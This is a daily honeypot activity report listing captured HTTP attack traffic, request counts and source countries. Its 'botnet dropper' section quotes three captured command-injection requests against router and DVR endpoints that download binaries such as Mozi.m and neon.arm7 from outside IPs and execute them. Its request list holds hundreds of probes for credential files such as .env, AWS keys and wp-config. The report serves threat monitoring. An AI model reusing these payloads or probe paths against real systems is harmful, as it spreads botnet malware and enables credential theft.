Table of Contents

Daily Report: 2025-05-25
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 435 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3330 requests were recorded during the day, originating from 3 different countries, with a peak of 1990 requests coming from FR.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Dubai
US	Dubai
US	Israel
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
176.65.148.236	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.1
42.228.114.101	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
141.98.11.137	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
210	2	GET /db_backup.sql HTTP/1.1
336	1	\x80\x00\x00(\xCA\xFE\xCA\xFE\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA0\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
338	1	GET /Odin/http/call1748188445 HTTP/1.1
343	1	\x00\x0E8Y\xD2\x8Dp\xAD.S\xEE\x00\x00\x00\x00\x00
360	1	\x00\x0E8\xF6\x83\xB7\xF9^\xE8\x1E\x93\x00\x00\x00\x00\x00
589	1	\x00\x0E8<\xA3C\xC7s\x8A%\xDB\x00\x00\x00\x00\x00
590	1	POST /dvr/cmd HTTP/1.1
606	1	GET /.circleci/.env HTTP/1.1
609	1	GET /.bitbucket/.env HTTP/1.1
610	1	GET /.bitbucket-pipelines.yml HTTP/1.1
611	1	GET /.bak HTTP/1.1
612	1	GET /.azure-pipelines.yml HTTP/1.1
613	1	GET /.aws/credentials/admin/.env HTTP/1.1
614	1	GET /.aws/credentials.bak HTTP/1.1
623	1	GET /.env.smtp HTTP/1.1
626	1	GET /.env.mail HTTP/1.1
627	1	GET /.env.key HTTP/1.1
629	1	GET /.env.hide HTTP/1.1
630	1	GET /.env.hidden HTTP/1.1
631	1	GET /.env.email HTTP/1.1
633	1	GET /.env.credentials HTTP/1.1
634	1	GET /.env.bkp HTTP/1.1
635	1	GET /.env-db HTTP/1.1
640	1	GET /.idea/.env HTTP/1.1
643	1	GET /.gitlab/.env HTTP/1.1
645	1	GET /.github/workflows/*.yml HTTP/1.1
646	1	GET /.github/.env HTTP/1.1
647	1	GET /.env_secret HTTP/1.1
648	1	GET /.env_private HTTP/1.1
649	1	GET /.env_copy HTTP/1.1
651	1	GET /.env_aws HTTP/1.1
661	1	GET /.vite/ HTTP/1.1
668	1	GET /.output/ HTTP/1.1
669	1	GET /_ignition/ HTTP/1.1
670	1	GET /_dev HTTP/1.1
671	1	GET /_astro/[chunk-name].[hash].js HTTP/1.1
673	1	GET /__debugbar HTTP/1.1
674	1	GET /debug HTTP/1.1
675	1	GET /?q=info HTTP/1.1
677	1	GET /?phpinfo.php HTTP/1.1
678	1	GET /?phpinfo HTTP/1.1
679	1	GET /?p=php HTTP/1.1
680	1	GET /?p=info HTTP/1.1
693	1	GET /_next/static/chunks/pages/_app-a9fba37d935ce3f3.js HTTP/1.1
694	1	GET /_next/static/chunks/main-app-[hash].js HTTP/1.1
695	1	GET /_next/static/chunks/framework-[hash].js HTTP/1.1
696	1	GET /_next/static/chunks/app/layout-a908fe02173ed4b1.js HTTP/1.1
697	1	GET /_next/static/chunks/app/global-error.js HTTP/1.1
698	1	GET /_next/static/chunks/app/error.js HTTP/1.1
699	1	GET /_next/static/chunks/app/%5B…not-found%5D/page-63e952e68a371605.js HTTP/1.1
700	1	GET /_next/static/chunks/945-34f67d7c0866cf61b970.js HTTP/1.1
702	1	GET /admin-api/ HTTP/1.1
703	1	GET /actuator/ HTTP/1.1
710	1	GET /_next/static/chunks/webpack-[hash].js HTTP/1.1
711	1	GET /_next/static/chunks/pages/_app-d25b242610000153a081.js HTTP/1.1
712	1	GET /_next/static/chunks/pages/_app-d1b5411bacd03f02.js HTTP/1.1
724	1	GET /adminphp.php’ HTTP/1.1
729	1	GET /adminapp/.env HTTP/1.1
738	1	GET /api/info HTTP/1.1
740	1	GET /api/docs/ HTTP/1.1
742	1	GET /api/.env.save HTTP/1.1
743	1	GET /api/.env.sample HTTP/1.1
744	1	GET /api/.env.example HTTP/1.1
745	1	GET /api/.env.back HTTP/1.1
746	1	GET /api-server/.env HTTP/1.1
747	1	GET /apc.php HTTP/1.1
750	1	GET /app/info HTTP/1.1
755	1	GET /app//.env.back HTTP/1.1
756	1	GET /app/.env.save HTTP/1.1
757	1	GET /app/.env.sample HTTP/1.1
758	1	GET /app/.env.example HTTP/1.1
761	1	GET /app-7d66de919618d3830635.js HTTP/1.1
766	1	GET /assets/vendor-[hash].js HTTP/1.1
767	1	GET /assets/js/app.f8ec9fb3.js HTTP/1.1
768	1	GET /assets/index-GquDNGwd.js HTTP/1.1
769	1	GET /assets/index-[hash].mjs HTTP/1.1
770	1	GET /assets/index-[hash].js HTTP/1.1
775	1	GET /application/.env.save HTTP/1.1
776	1	GET /application/.env.sample HTTP/1.1
781	1	GET /backend/debug HTTP/1.1
792	1	GET /azure/.env HTTP/1.1
794	1	GET /aws-secret.json HTTP/1.1
795	1	GET /aws-credentials.txt HTTP/1.1
798	1	GET /Booking/Default.aspx HTTP/1.1
815	1	GET /cgi-bin/pass.txt HTTP/1.1
819	1	GET /build/routes/index-[hash].js HTTP/1.1
820	1	GET /build/main.ba0c34b7.js HTTP/1.1
821	1	GET /build/entry.client-[hash].js HTTP/1.1
822	1	GET /build/_app/immutable/entry/app.[hash].js HTTP/1.1
823	1	GET /build/_app/immutable/chunks/[chunk].[hash].js HTTP/1.1
832	1	GET /chunk-B2FODB4I.js HTTP/1.1
847	1	GET /compose/.env HTTP/1.1
863	1	GET /control/.env HTTP/1.1
865	1	GET /containers/.env HTTP/1.1
870	1	GET /config/keys.yml HTTP/1.1
893	1	GET /dev-env/.env HTTP/1.1
894	1	GET /dev-api/ HTTP/1.1
905	1	GET /debug.json HTTP/1.1
907	1	GET /db-admin/ HTTP/1.1
914	1	GET /dist/js/app.[hash].js HTTP/1.1
917	1	GET /devtools HTTP/1.1
922	1	GET /dev_env/.env HTTP/1.1
932	1	GET /docker/dev/.env HTTP/1.1
941	1	GET /error.log HTTP/1.1
942	1	GET /envs/.env HTTP/1.1
1026	1	GET /graphiql/ HTTP/1.1
1027	1	GET /google/.env HTTP/1.1
1029	1	GET /gists/pusher HTTP/1.1
1030	1	GET /gists/laravel HTTP/1.1
1032	1	GET /gcp/.env HTTP/1.1
1033	1	GET /gcloud.json HTTP/1.1
1052	1	GET /hc/restricted HTTP/1.1
1063	1	GET /inc.config.php HTTP/1.1
1069	1	GET /js/chunk-vendors.[hash].js HTTP/1.1
1070	1	GET /js/chunk-79be581b.c4b0f5e4.js HTTP/1.1
1071	1	GET /js/app.bundle.min.js HTTP/1.1
1072	1	GET /js/app.[hash].js HTTP/1.1
1074	1	GET /joomla/.env HTTP/1.1
1080	1	GET /internal/config HTTP/1.1
1081	1	GET /internal/ HTTP/1.1
1082	1	GET /internal-api/ HTTP/1.1
1085	1	GET /lambda/.env HTTP/1.1
1088	1	GET /kubernetes/.env HTTP/1.1
1095	1	GET /k8s/.env HTTP/1.1
1098	1	GET /js/vendor.[hash].js HTTP/1.1
1099	1	GET /js/contact_me.js HTTP/1.1
1100	1	GET /js/chunks/[chunk-name].[hash].js HTTP/1.1
1103	1	GET /libraries/.env HTTP/1.1
1110	1	GET /legacy/tests/9.2.0 HTTP/1.1
1111	1	GET /legacy/tests/9.1.1 HTTP/1.1
1118	1	GET /magento/.env HTTP/1.1
1119	1	GET /logs/app.log HTTP/1.1
1127	1	GET /log.txt HTTP/1.1
1130	1	GET /local.settings.json HTTP/1.1
1136	1	GET /main.b610bd7c7b9b7a47.js HTTP/1.1
1137	1	GET /main.702787bb88cacd05b11d.js HTTP/1.1
1138	1	GET /main.58a95e8d8659972f.js HTTP/1.1
1139	1	GET /main.48f1bbcf6201c5ea.js HTTP/1.1
1140	1	GET /main.457ddfd2b1341056.js HTTP/1.1
1141	1	GET /main.35a08c25eb91de70487f.js HTTP/1.1
1142	1	GET /main.2b8841d1a101dd041285.js HTTP/1.1
1143	1	GET /main.0ad61943313a734cc3ac.js HTTP/1.1
1144	1	GET /main-WTCAS2AO.js HTTP/1.1
1145	1	GET /main-TDTOTK7F.js HTTP/1.1
1146	1	GET /main-es2018.96dcf91e05121e327dcb.js HTTP/1.1
1147	1	GET /main-es2015.3c3aa123423ff18c0b00.js HTTP/1.1
1167	1	GET /next/.env HTTP/1.1
1172	1	GET /nest/.env HTTP/1.1
1182	1	GET /opencart/.env HTTP/1.1
1184	1	GET /old_site/ HTTP/1.1
1189	1	GET /nuxt/.env HTTP/1.1
1191	1	GET /now.json HTTP/1.1
1197	1	GET /package/dynamic_js/81361875dcdb133893cbb29f77487781bd31d666647c61421b96dfa6e873787f/unicesumaradmissaodigital/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1198	1	GET /package/dynamic_js/7c2dd93aed15103586508689b0926f22cb22615eaa7027d6a140541577df9c26/ademypro/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1199	1	GET /package/dynamic_js/784245312a05d33ae694c74388342d13cd25c74fdb72c84a0b8f0c20fb1b9baf/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1200	1	GET /package/dynamic_js/744aa7a9e0404e5ec9c1b3f4d4c2f063351d79e547f96be7c67518970f0bb51c/applypass/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1201	1	GET /package/dynamic_js/48c889d4f074be3c11d2a9aa14999e5c81e431800b5d4350cfc8b530999f8f57/isystempro2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1202	1	GET /package/dynamic_js/36b55042526fc51c735e1ac51f845e93c8d813af2fb6ad5c92d6fbcb2a03b0c4/meu-ingresso-2023/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1203	1	GET /package/dynamic_js/2b53c5ae6721d896f729102fbb2fb0f35196a11f5124ad2b509705367f9be49c/jwmlog2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1204	1	GET /package/dynamic_js/2a3f09a40c9d3d29b51271b66fac894cdd514948311a82e82a458b43b4f8ff9b/applypass/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1205	1	GET /package/dynamic_js/185fc49e7cbfb81d04d4e36e96846104f364cc4dcf202d9da8ef4f93547a646d/interpali/live/404/xnull/xfalse/xfalse/de_de/xfalse/xfalse/dynamic.js HTTP/1.1
1206	1	GET /package/dynamic_js/11530e64f1040d92633c20c26d4c19fe92c2d9a22fffc9631b6101840a55a101/niche-links/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1207	1	GET /package/dynamic_js/052355b33aa284cc76967061007eac6fefae9d406040fa0cba0cae3b11173189/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1208	1	GET /package/dynamic_js/048fa3053c370aea887f517323b190398c2fe523327c29711d24c2fe4c29fabc/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1220	1	GET /package/dynamic_js/e929402614901c2ef599d15bc501af6dfbba1f5d843a7a80a273082588eeea94/sobreloja/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1221	1	GET /package/dynamic_js/e5b1aee992cb23b01a4716f2ca28034d950c65a9e9d5e136bbede53863b86857/nextadelivery/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1222	1	GET /package/dynamic_js/e313c55db568951985459b8dc72a601bb19d68a4d9e27bb8bec8988c6534528e/unicesumaradmissaodigital/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1223	1	GET /package/dynamic_js/cf757dcb0590456003b71427e18f8d45aa0fbb53a193e37cb6beccf0db6c843e/xxpressio/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1224	1	GET /package/dynamic_js/af58896ce0256c58237b9bb2007f484e1439d89eeeda8499ab2488b301c046b3/petgenius/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1225	1	GET /package/dynamic_js/a8d0dbecfae07a8db959506db9dc23249690674e7d34c9ff8fd0ada5a3c9ee54/meu-ingresso-2023/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1226	1	GET /package/dynamic_js/91bffd6b1bd42ff8acc67240c7a8b382e6c9639de98968c71d922e9248601390/crewlab-coachingtools/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1227	1	GET /package/dynamic_js/90a4f2e10656f9e1c80c0c66836218eead17a96e4dc8d49fb049fd00b90721ac/isystempro2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1
1228	1	GET /package/dynamic_js/8a82f8172ed0fda7dbe314b70738018ff4693e866d72fbffe6fbb2f476d1bba5/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1
1285	1	GET /preview/.env HTTP/1.1
1286	1	GET /preview-env/.env HTTP/1.1
1287	1	GET /prestashop/.env HTTP/1.1
1296	1	GET /rails/.env HTTP/1.1
1304	1	GET /public/system HTTP/1.1
1309	1	GET /rollup.config.js HTTP/1.1
1341	1	GET /serverless.yml HTTP/1.1
1372	1	GET /service-worker.js HTTP/1.1
1378	1	GET /source/.env HTTP/1.1
1385	1	GET /shopware/.env HTTP/1.1
1405	1	GET /static/js/main.36e5ec99.js HTTP/1.1
1406	1	GET /static/js/main.335d17a0.js HTTP/1.1
1407	1	GET /static/js/main.1b34ee2a.js HTTP/1.1
1408	1	GET /static/js/main.11bc02d8.chunk.js HTTP/1.1
1409	1	GET /static/js/*.chunk.js HTTP/1.1
1413	1	GET /staging/frontend/.env HTTP/1.1
1414	1	GET /staging/backend/.env HTTP/1.1
1415	1	GET /staging/api/.env HTTP/1.1
1417	1	GET /staging-api/ HTTP/1.1
1419	1	GET /stack.json HTTP/1.1
1422	1	GET /strapi/.env HTTP/1.1
1423	1	GET /storage/debugbar/*.json HTTP/1.1
1429	1	GET /static/js/main.ef8ecb99.chunk.js HTTP/1.1
1430	1	GET /static/js/main.bfa51071.js HTTP/1.1
1431	1	GET /static/js/main.8c18b542.js HTTP/1.1
1432	1	GET /static/js/main.89c971fa.js HTTP/1.1
1433	1	GET /static/js/main.87c766e3.js HTTP/1.1
1434	1	GET /static/js/main.602cea98.chunk.js HTTP/1.1
1435	1	GET /static/js/main.4aa2819f.js HTTP/1.1
1436	1	GET /static/js/main.48389ac6.js HTTP/1.1
1448	1	GET /system/config HTTP/1.1
1450	1	GET /swagger/ HTTP/1.1
1492	1	GET /testing/ HTTP/1.1
1503	1	GET /tmp/logs HTTP/1.1
1504	1	GET /tmp/config/.env HTTP/1.1
1534	1	GET /vue/.env HTTP/1.1
1541	1	GET /vendors~main.f286c0f60bdc707d91a8.bundle.js HTTP/1.1
1545	1	GET /v1/private/ HTTP/1.1
1546	1	GET /v1/debug/ HTTP/1.1
1547	1	GET /v1/admin/ HTTP/1.1
1557	1	GET /webpack-stats.json HTTP/1.1
1568	1	GET /wpp-config.php~ HTTP/1.1
1571	1	GET /wp-login/.env HTTP/1.1
1575	1	GET /wp-config.php~ HTTP/1.1
1578	1	GET /workspace/.env HTTP/1.1
1592	1	GET /:8443/.env HTTP/1.1
1593	1	GET /:8081/.env HTTP/1.1
1597	1	GET /tmp/info.php HTTP/1.1
1598	1	GET /testinfo.php HTTP/1.1
1599	1	GET /test_php.php HTTP/1.1
1600	1	GET /php_test.php HTTP/1.1
1601	1	GET /phpdebug.php HTTP/1.1
1602	1	GET /3.php HTTP/1.1
1613	1	GET /www/phpinfo.php HTTP/1.1
1618	1	GET /vendor/phpinfo.php HTTP/1.1
1619	1	GET /sites/default/phpinfo.php HTTP/1.1
1620	1	GET /wp-content/phpinfo.php HTTP/1.1
1621	1	GET /monitoring/phpinfo.php HTTP/1.1
1622	1	GET /setup/phpinfo.php HTTP/1.1
1626	1	GET /admin/tools/phpinfo.php HTTP/1.1
1628	1	GET /dump.php HTTP/1.1
1632	1	GET /phpver.php HTTP/1.1
1635	1	GET /z.php HTTP/1.1
1636	1	GET /y.php HTTP/1.1
1637	1	GET /abc.php HTTP/1.1
1639	1	GET /serverinfo.php HTTP/1.1
1640	1	GET /sysinfo.php HTTP/1.1
1641	1	GET /phpinfo.cgi HTTP/1.1
1642	1	GET /phpinfo.inc HTTP/1.1
1643	1	GET /phpinfo.phps HTTP/1.1
1644	1	GET /phpinfo.phtml HTTP/1.1
1645	1	GET /phpinfo_2024.php HTTP/1.1
1646	1	GET /phpinfo_2023.php HTTP/1.1
1647	1	GET /phpinfo.php.swo HTTP/1.1
1648	1	GET /phpinfo.php.swp HTTP/1.1
1649	1	GET /phpinfo.php.original HTTP/1.1
1650	1	GET /phpinfo.php.orig HTTP/1.1
1651	1	GET /phpinfo.copy.php HTTP/1.1
1652	1	GET /phpinfo.backup HTTP/1.1
1653	1	GET /phpinfo.bak HTTP/1.1
1654	1	GET /phpinfo_backup.php HTTP/1.1
1655	1	GET /phpinfo.old.php HTTP/1.1
1656	1	GET /phpinfo.php.old HTTP/1.1
1657	1	GET /phpinfo.php.save HTTP/1.1
1658	1	GET /phpinfo.php.bak HTTP/1.1
1660	1	GET /phpmyadmin/phpinfo.php HTTP/1.1
1664	1	GET /wp-config.old.php HTTP/1.1
1667	1	GET /phpinfo.bak/phpinfo.php HTTP/1.1
1668	1	GET /archive/phpinfo.php HTTP/1.1
1670	1	GET /bak/phpinfo.php HTTP/1.1
1671	1	GET /backups/phpinfo.php HTTP/1.1
1673	1	GET /phpinfo_v2.php HTTP/1.1
1674	1	GET /phpinfo_v1.php HTTP/1.1
1675	1	GET /phpinfo_01.php HTTP/1.1
1676	1	GET /phpinfo_2025.php HTTP/1.1
1678	1	GET /wp-config.sample.php HTTP/1.1
1680	1	GET /wp-config.php.off HTTP/1.1
1682	1	GET /wp-config-localhost.php HTTP/1.1
1684	1	GET /wp-config-test.php HTTP/1.1
1685	1	GET /wp-config.dev.php HTTP/1.1
1687	1	GET /wp-config.new.php HTTP/1.1
1689	1	GET /wp-config1.php HTTP/1.1
1692	1	GET /wp-config.php.copy HTTP/1.1
1693	1	GET /xampp/security/lang.php HTTP/1.1
1694	1	GET /xampp/check.php HTTP/1.1
1695	1	GET /xampp/test.php HTTP/1.1
1696	1	GET /xampp/admin.php HTTP/1.1
1697	1	GET /xampp/setup.php HTTP/1.1
1698	1	GET /xampp/restart.php HTTP/1.1
1699	1	GET /xampp/stop.php HTTP/1.1
1700	1	GET /xampp/start.php HTTP/1.1
1702	1	GET /~wp-config.php HTTP/1.1
1703	1	GET /tmp/wp-config.php HTTP/1.1
1704	1	GET /old/wp-config.php HTTP/1.1
1705	1	GET /bak/wp-config.php HTTP/1.1
1706	1	GET /backups/wp-config.php HTTP/1.1
1707	1	GET /backup/wp-config.php HTTP/1.1
1709	1	GET /xampp/index.php.orig HTTP/1.1
1710	1	GET /xampp/index.php.txt HTTP/1.1
1711	1	GET /xampp/index.php.save HTTP/1.1
1712	1	GET /xampp/index.php.old HTTP/1.1
1713	1	GET /xampp/index.php.bak HTTP/1.1
1714	1	GET /xampp/security.php.old HTTP/1.1
1715	1	GET /xampp/security.php.bak HTTP/1.1
1716	1	GET /xampp/status.php.old HTTP/1.1
1717	1	GET /xampp/lang.php.old HTTP/1.1
1718	1	GET /xampp/lang.php.bak HTTP/1.1
1719	1	GET /xampp/phpinfo.php~ HTTP/1.1
1720	1	GET /xampp/phpinfo.php.old HTTP/1.1
1721	1	GET /xampp/phpinfo.php.save HTTP/1.1
1722	1	GET /xampp/phpinfo.php.bak HTTP/1.1
1723	1	GET /xampp/security/phpinfo.php HTTP/1.1
1724	1	GET /xampp/security/xamppsecurity.php HTTP/1.1
1725	1	GET /phpmyadmin/test.php HTTP/1.1
1726	1	GET /phpmyadmin/phpinfo.php.bak HTTP/1.1
1727	1	GET /phpmyadmin/config.inc.php.txt HTTP/1.1
1728	1	GET /phpmyadmin/config.inc.php~ HTTP/1.1
1729	1	GET /phpmyadmin/config.inc.php.old HTTP/1.1
1730	1	GET /phpmyadmin/config.inc.php.save HTTP/1.1
1731	1	GET /phpmyadmin/config.inc.php.bak HTTP/1.1
1732	1	GET /phpmyadmin/config.inc.php HTTP/1.1
1733	1	GET /phpmyadmin/setup/ HTTP/1.1
1735	1	GET /xampp/config.inc.php.txt HTTP/1.1
1736	1	GET /xampp/config.inc.php.save HTTP/1.1
1737	1	GET /xampp/config.inc.php.old HTTP/1.1
1738	1	GET /xampp/config.inc.php.bak HTTP/1.1
1739	1	GET /xampp/config.inc.php HTTP/1.1
1740	1	GET /xampp/.htaccess HTTP/1.1
1742	1	GET /xampp/.DS_Store HTTP/1.1
1743	1	GET /xampp/.svn/ HTTP/1.1
1744	1	GET /xampp/.git/ HTTP/1.1
1745	1	GET /xampp/CHANGELOG.txt HTTP/1.1
1746	1	GET /xampp/LICENSE.txt HTTP/1.1
1747	1	GET /xampp/README.txt HTTP/1.1
1748	1	GET /xampp/access.log HTTP/1.1
1749	1	GET /xampp/debug.log HTTP/1.1
1750	1	GET /xampp_error.log HTTP/1.1
1751	1	GET /xampp.log HTTP/1.1
1752	1	GET /xampp.ini HTTP/1.1
1753	1	GET /xampp-control.ini HTTP/1.1
1754	1	GET /xampp-control.exe HTTP/1.1
1755	1	GET /xampp-readme.txt HTTP/1.1
1756	1	GET /phpmyadmin/setup/index.php HTTP/1.1
1758	1	GET /sql.php HTTP/1.1
1759	1	GET /mysql_connect.php HTTP/1.1
1760	1	GET /mysql.php HTTP/1.1
1761	1	GET /connect.php HTTP/1.1
1762	1	GET /dbconnection.php HTTP/1.1
1763	1	GET /dbconn.php HTTP/1.1
1764	1	GET /dbconnect.php HTTP/1.1
1766	1	GET /config_prod.php HTTP/1.1
1767	1	GET /config.local.php HTTP/1.1
1768	1	GET /credentials.php HTTP/1.1
1770	1	GET /bootstrap.php HTTP/1.1
1772	1	GET /connection.php HTTP/1.1
1773	1	GET /azure_config.php HTTP/1.1
1774	1	GET /aws_config.json HTTP/1.1
1775	1	GET /gcloud.php HTTP/1.1
1776	1	GET /google_config.php HTTP/1.1
1777	1	GET /google_api.php HTTP/1.1
1778	1	GET /gcp_config.php HTTP/1.1
1779	1	GET /aws_sdk.php HTTP/1.1
1780	1	GET /aws_config.inc.php HTTP/1.1
1781	1	GET /aws_secrets.php HTTP/1.1
1782	1	GET /aws_keys.php HTTP/1.1
1783	1	GET /aws_credentials.php HTTP/1.1
1784	1	GET /aws_config.php HTTP/1.1
1785	1	GET /config/packages/prod/doctrine.yaml HTTP/1.1
1787	1	GET /sites/default/services.yml HTTP/1.1
1789	1	GET /api_secrets.php HTTP/1.1
1790	1	GET /api_credentials.php HTTP/1.1
1792	1	GET /checkout_config.php HTTP/1.1
1793	1	GET /payments_api.php HTTP/1.1
1794	1	GET /payments_config.php HTTP/1.1
1795	1	GET /stripe_secret_key.php HTTP/1.1
1796	1	GET /stripe_secrets.php HTTP/1.1
1797	1	GET /paypal_credentials.php HTTP/1.1
1798	1	GET /paypal_keys.php HTTP/1.1
1799	1	GET /paypal_config.php HTTP/1.1
1800	1	GET /stripe_config.php HTTP/1.1
1801	1	GET /stripe_keys.php HTTP/1.1
1802	1	GET /azure_config.json HTTP/1.1
1803	1	GET /azure_credentials.php HTTP/1.1
1804	1	GET /azure_keys.php HTTP/1.1
1805	1	GET /config.dev.php HTTP/1.1
1807	1	GET /mail_credentials.php HTTP/1.1
1808	1	GET /mail_config.inc.php HTTP/1.1
1809	1	GET /mail_config.php HTTP/1.1
1810	1	GET /email_credentials.php HTTP/1.1
1811	1	GET /email_secrets.php HTTP/1.1
1812	1	GET /email_config.php HTTP/1.1
1814	1	GET /smtp_settings.php HTTP/1.1
1815	1	GET /smtp_credentials.php HTTP/1.1
1816	1	GET /smtp_config.php HTTP/1.1
1817	1	GET /secret_config.php HTTP/1.1
1818	1	GET /api_config.php HTTP/1.1
1819	1	GET /private_api_keys.php HTTP/1.1
1821	1	GET /js/credentials.js HTTP/1.1
1822	1	GET /js/api_keys.js HTTP/1.1
1823	1	GET /stacktrace.php HTTP/1.1
1824	1	GET /trace.php HTTP/1.1
1825	1	GET /verbose.php HTTP/1.1
1826	1	GET /debug_config.php HTTP/1.1
1827	1	GET /logs.php HTTP/1.1
1829	1	GET /sensitive_data.php HTTP/1.1
1830	1	GET /security.php HTTP/1.1
1831	1	GET /security_config.php HTTP/1.1
1832	1	GET /private_config.php HTTP/1.1
1833	1	GET /private_keys.php HTTP/1.1
1834	1	GET /passwords.php HTTP/1.1
1835	1	GET /db_config.inc.php HTTP/1.1
1836	1	GET /db_connect.php HTTP/1.1
1837	1	GET /wp-content/uploads/*/config.php HTTP/1.1
1838	1	GET /wp-content/plugins/*/settings.php HTTP/1.1
1839	1	GET /wp-content/plugins/*/config.php HTTP/1.1
1840	1	GET /wp-content/themes/*/config.php HTTP/1.1
1841	1	GET /node_modules/facebook-oauth.js HTTP/1.1
1842	1	GET /node_modules/paypal.js HTTP/1.1
1843	1	GET /node_modules/google-api.js HTTP/1.1
1844	1	GET /node_modules/stripe.js HTTP/1.1
1845	1	GET /node_modules/aws-sdk.js HTTP/1.1
1846	1	GET /js/google_oauth.js HTTP/1.1
1847	1	GET /js/paypal_config.js HTTP/1.1
1848	1	GET /js/stripe_config.js HTTP/1.1
1849	1	GET /js/aws_config.js HTTP/1.1
1850	1	GET /js/google_api.js HTTP/1.1
1857	1	GET /backup/credentials.php HTTP/1.1
1859	1	GET /settings_backup.php HTTP/1.1
1860	1	GET /config_backup.tar HTTP/1.1
1861	1	GET /config_backup.sql HTTP/1.1
1862	1	GET /db_backup.tar HTTP/1.1
1864	1	GET /config.php~ HTTP/1.1
1865	1	GET /db.php.save HTTP/1.1
1867	1	GET /wp-content/uploads/*/private.php HTTP/1.1
1868	1	GET /wp-content/uploads/*/secrets.php HTTP/1.1
1997	1	\x00\x0E8\x17\xE9\xA7\x8F\xF6L\x5CY\x00\x00\x00\x00\x00
2045	1	HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1
2046	1	HEAD /invoker/EJBInvokerServlet HTTP/1.1
2075	1	HEAD /web-console/ServerInfo.jsp HTTP/1.1
2076	1	HEAD /invoker/JMXInvokerServlet HTTP/1.1
2122	1	GET /OdinHttpCall1748188445 HTTP/1.1
2124	1	GET /odinhttpcall1748188445 HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	1990	FR
1	366	BG
2	278	US
3	159	DE
4	135	IN
5	64	PL
6	49	VN
7	49	NL
8	45	CH
9	40	CN
10	22	GB
11	21	LT
12	16	UA
13	15	SC
14	12	AZ
15	7	IL
16	6	SG
17	6	BE
18	5	RO
19	5	ZA
20	5	GH
21	4	RU
22	4	AU
23	3	CA
24	3	KR
25	2	SA
26	2	GE
27	2	JP
28	2	AR
29	2	IE
30	1	IT
31	1	PT
32	1	HK
33	1	ID
34	1	BD
35	1	PK
36	1	NZ
37	1	TR
38	1	ES
39	1	AO
40	1	SE